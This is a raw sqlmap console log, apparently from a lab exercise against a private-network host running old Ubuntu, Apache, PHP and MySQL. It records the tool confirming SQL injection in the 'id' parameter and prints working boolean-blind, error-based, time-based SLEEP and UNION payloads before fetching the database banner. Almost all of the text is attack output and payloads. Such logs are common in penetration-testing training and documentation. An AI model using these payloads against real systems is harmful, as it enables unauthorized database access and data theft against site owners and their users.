        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:51:49 /2025-06-27/

[09:51:49] [INFO] testing connection to the target URL
[09:51:49] [INFO] testing if the target URL content is stable
[09:51:50] [INFO] target URL content is stable
[09:51:50] [INFO] testing if GET parameter 'id' is dynamic
[09:51:50] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:51:50] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:51:50] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:51:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:51:50] [WARNING] reflective value(s) found and filtering out
[09:51:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:51:50] [INFO] GET parameter 'id' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="App")
[09:51:50] [INFO] testing 'Generic inline queries'
[09:51:50] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:51:50] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:51:50] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:51:50] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:51:51] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:51:51] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:51:51] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:51:51] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:51:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:51:51] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:51:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:51:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:51:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:51:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:51:51] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:51:51] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[09:51:51] [INFO] testing 'MySQL inline queries'
[09:51:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:51:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:51:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:51:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:51:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:51:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:51:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:52:01] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:52:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:52:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:52:01] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:52:01] [INFO] target URL appears to have 2 columns in query
[09:52:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7406=7406) THEN 1 ELSE (SELECT 1864 UNION SELECT 1238) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND ROW(2484,1884)>(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(2484=2484,1))),0x716b6a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 2008 UNION SELECT 3074 UNION SELECT 3727 UNION SELECT 2343)a GROUP BY x)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5779 FROM (SELECT(SLEEP(5)))yOIm)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x7162627171,0x4c5a4e596d5577597a4b6a5159456258524b58766143746a6f63776f74725770764d447251495779,0x716b6a7a71),NULL-- -&Submit=Submit
---
[09:52:02] [INFO] the back-end DBMS is MySQL
[09:52:02] [INFO] fetching banner
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 4.1
banner: '5.0.51a-3ubuntu5'
[09:52:02] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.0.11'

[*] ending @ 09:52:02 /2025-06-27/

